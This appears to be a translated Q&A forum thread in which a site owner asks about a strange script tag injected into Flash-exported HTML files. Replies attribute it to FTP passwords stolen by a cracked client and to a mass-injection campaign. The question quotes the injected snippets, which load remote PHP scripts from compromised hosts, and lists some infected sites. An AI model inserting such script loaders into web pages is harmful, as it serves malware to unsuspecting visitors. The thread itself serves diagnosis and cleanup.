【问题标题】:Weird script reference injection in my htmls我的 html 中奇怪的脚本引用注入
【发布时间】:2013-11-05 21:56:52
【问题描述】:

一位朋友正在将 flash 文件上传到我的服务器,其中包含 Flash CS6 编辑器在其 export 命令中建议的所有 html 包

好吧,尽管有这么多的 Flash 讨论,但问题是最终会在 head 元素中出现一个非常奇怪的脚本引用:

<!--339810--><script type="text/javascript">var gwloaded = false;</script>
<script src="http://techmounting.com.au/KsEsFOFC.php" type="text/javascript"></script><!--/339810-->

这个脚本引用不在原始html文件中..这闻起来是病毒,但我在整个google中都没有找到任何引用..我不知道是否是病毒在我朋友的电脑上或在我的服务器上等等。

有什么想法吗?

另一个例子(不在我的服务器中)

http://www.iu-jaen.es(不使用浏览器访问)

http://www.alliedcarehomehealth.com(不使用浏览器访问)

<script type="text/javascript">var gwloaded = false;</script>
<script src="http://shinhanvn.com.vn/Uploads/iOVAO5QT.php" type="text/javascript"></script>

【问题讨论】:

  • 我认为我们检测到了攻击是如何进行的,我的朋友正在使用“破解”版本的 FTP Windows 客户端。看起来 crack 包含某种木马。 黑黑客从这个 ftp 用户那里获取了密码,他们正在修改他们有权访问的 html 文件。修复 html 文件不是解决方案,因为这些文件在几天内又被修改了。更改ftp客户端,ftp密码解决了问题。

标签: html windows ftp virus


【解决方案1】:

您的网络服务器已被入侵。 TL;DR 您的网站将向访问用户显示内容阻止插页式广告,这会将他们引导至可疑的二进制下载。安全漏洞的原因尚不清楚,但我会采取正常的预防措施:重置相关密码,在 PHP/javascript 文件中查找可疑代码 sn-ps。

Google 还对您可以采取的一些清理网站的步骤(更新第三方插件、更改 PW 等)进行了很好的概述:

https://support.google.com/webmasters/answer/163634

有关此攻击行为的摘要,请参阅 WebSense 的此安全帖子:

http://community.websense.com/blogs/securitylabs/archive/tags/Mass+Injection/default.aspx

【讨论】:

  • 考虑将博文中提供的信息直接添加到您的答案中,以避免以后出现断开的链接。谢谢,欢迎来到!
  • 谢谢西蒙!更新了我的回复。
猜你喜欢
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 2022-09-29
  • 2016-07-27
  • 2015-01-16
  • 2015-06-02
  • 2018-08-07
  • 1970-01-01
相关资源
最近更新 更多